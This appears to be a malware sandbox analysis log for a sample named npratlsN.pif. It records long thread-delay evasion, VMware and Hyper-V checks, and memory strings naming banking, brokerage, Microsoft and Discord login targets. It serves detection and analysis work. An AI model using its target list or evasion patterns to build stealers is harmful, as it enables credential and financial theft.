Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -591471s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -591346s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -591221s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -591096s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8128	Thread sleep time: -590971s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep count: 35 > 30
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7296	Thread sleep count: 1556 > 30
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -599891s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7296	Thread sleep count: 8248 > 30
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -599782s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep count: 39 > 30
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -599657s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -599532s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -599407s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -599282s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -599157s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -599047s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -598938s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -598813s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -598688s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -598563s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -598438s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -598328s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -598219s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -598094s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -597985s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -597860s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -597735s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -597610s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -597485s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -597360s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -597235s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -597110s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -596985s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -596860s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -596735s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -596610s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -596485s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -596360s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -596235s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -596110s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -595985s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -595860s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -595735s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -595610s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -595485s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -595360s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -595235s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -595110s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -594985s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -594860s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -594735s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -594610s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -594485s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -594360s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -594235s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -594110s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 3920	Thread sleep time: -593985s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_02785908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

7_2_02785908

Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599758	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599638	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599374	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599265	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599156	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599046	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598821	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598154	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597390	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597279	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596515	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596294	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595200	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595087	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594869	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594665	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594546	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594436	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594218	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599880
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599766
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599641
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599516
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599406
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599297
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599188
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599063
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598938
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598828
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598608
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598490
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598365
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598232
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598121
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598000
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597883
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597776
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597659
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597524
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597410
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597270
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597020
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596368
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596223
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596073
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595841
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595711
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595598
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595464
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595314
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595171
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595058
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594947
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594833
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594705
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594580
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594470
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594330
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593808
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593690
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593565
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593455
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593315
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593190
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593065
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592940
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592815
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592699
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592596
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592455
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592330
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592205
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592096
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591955
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591846
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591721
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591596
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591471
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591346
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591221
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591096
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 590971
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599891
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599782
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599657
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599532
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599407
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599282
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599157
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599047
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598938
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598813
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598688
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598563
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598438
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598328
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598219
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598094
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597985
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597860
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597735
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597610
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597485
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597360
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597235
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597110
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596985
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596860
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596735
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596610
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596485
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596360
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596235
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596110
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595985
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595860
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595735
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595610
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595485
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595360
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595235
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595110
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594985
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594860
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594735
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594610
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594485
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594360
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594235
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594110
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593985

Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: brightness.exe, 00000007.00000002.2244059195.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2244059195.000000000069F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3847686800.0000000026796000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWs$hn
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: npratlsN.pif, 0000000F.00000002.3847403141.000000002B87B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: npratlsN.pif, 0000000D.00000002.3861251600.000000001F140000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2373945220.0000000000523000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 00000010.00000002.2448305131.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
